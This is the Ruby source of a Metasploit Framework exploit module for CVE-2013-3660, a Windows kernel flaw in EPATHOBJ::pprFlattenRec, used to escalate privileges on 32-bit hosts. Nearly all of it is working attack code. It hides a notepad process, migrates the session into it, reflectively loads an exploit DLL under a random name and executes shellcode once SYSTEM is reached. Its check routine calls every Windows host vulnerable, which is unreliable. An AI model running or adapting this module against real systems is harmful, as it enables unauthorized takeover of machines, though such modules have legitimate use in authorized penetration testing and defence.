##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/process'

class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
      'Description'    => %q{
          This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
        of uninitialized data which allows to corrupt memory. At the moment, the module has
        been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
          'progmboy <programmeboy[at]gmail.com>',    # Original Exploit
          'Keebie4e',    # Metasploit integration
          'egypt',       # Metasploit integration
          'sinn3r',      # Metasploit integration
          'Meatballs',   # Metasploit integration
          'juan vazquez' # Metasploit integration
        ],
      'Arch'           => ARCH_X86,
      'Platform'       => 'win',
      'SessionTypes'   => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ]
        ],
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'     =>
        [
          [ 'CVE', '2013-3660' ],
          [ 'EDB', '25912' ],
          [ 'OSVDB', '93539' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ],
        ],
      'DisclosureDate' => 'May 15 2013',
      'DefaultTarget'  => 0
    }))

  end

  def check
    os = sysinfo["OS"]
    if os =~ /windows/i
      return Exploit::CheckCode::Vulnerable
    end
  end

  def exploit

    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Exploit::Failure::NoTarget, "Running against WOW64 is not supported")
    elsif sysinfo["Architecture"] =~ /x64/
      fail_with(Exploit::Failure::NoTarget, "Running against 64-bit systems is not supported")
    end

    print_status("Creating a new process and migrating...")

    cmd = "#{expand_path("%windir%")}\\System32\\notepad.exe"
    new_proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
    new_pid = new_proc.pid

    if not new_pid
      print_error("Filed to create the new process, trying in the current one, if unsuccessful migrate by yourself")
    else
      print_status("Migrating to #{new_pid}")
      migrate_res = false

      begin
        migrate_res = session.core.migrate(new_pid)
      rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError
        migrate_res = false
      end

      if migrate_res
        print_good("Successfully migrated to process #{new_pid}")
      else
        print_warning("Unable to migrate to process #{new_pid.to_s}, trying current #{session.sys.process.getpid} instead. If still unsuccessful, please migrate manually")
      end
    end

    print_status("Trying to load the exploit and executing...")

    session.core.load_library({
      "LibraryFilePath" => File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-3660", "exploit.dll"),
      "UploadLibrary"   => true,
      "Extension"       => false,
      "TargetFilePath"  => "#{rand_text_alpha(5 + rand(3))}.dll",
      "SaveToDisk"      => false
    })

    print_status("Checking privileges after exploitation...")

    if is_system?
      print_good("Exploitation successful!")
    else
      fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful but should be safe to try again")
    end

    if execute_shellcode(payload.encoded)
      print_good("Enjoy!")
    else
      fail_with(Exploit::Failure::Unknown, "Error while executing the payload")
    end

  end


end